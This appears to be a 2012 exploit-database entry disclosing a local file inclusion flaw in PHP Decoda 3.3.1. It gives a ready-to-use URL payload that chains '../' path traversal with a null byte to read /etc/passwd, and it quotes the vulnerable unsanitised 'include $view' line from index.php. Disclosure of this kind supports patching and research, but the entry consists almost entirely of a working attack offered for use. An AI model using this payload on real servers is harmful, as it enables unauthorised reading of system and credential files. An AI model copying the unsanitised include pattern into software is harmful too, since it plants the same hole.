PHP Decoda 3.3.1 - Local File Inclusion



EKU-ID: 24796 CVE: OSVDB-ID:
Author: Number 7 Published: 2012-06-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit Title: [php-decoda local file inclusion ]
# Date: [16/06/2012]
# Author: [Number 7]
# Software Link: [http://milesj.me/code/php/decoda]
# Version: [3.3.1]
# Tested on: [linux]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exp:
http://localhost/milesj-php-decoda/index.php?view=../../../../../../../etc/passwd%00

~~Line 111 in Index.php:
	<?php	include $view .'.php'; ?>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blogpot:   [http://TunisianSeven.blogspot.com/]
Twitter:   [@TunisianSeven]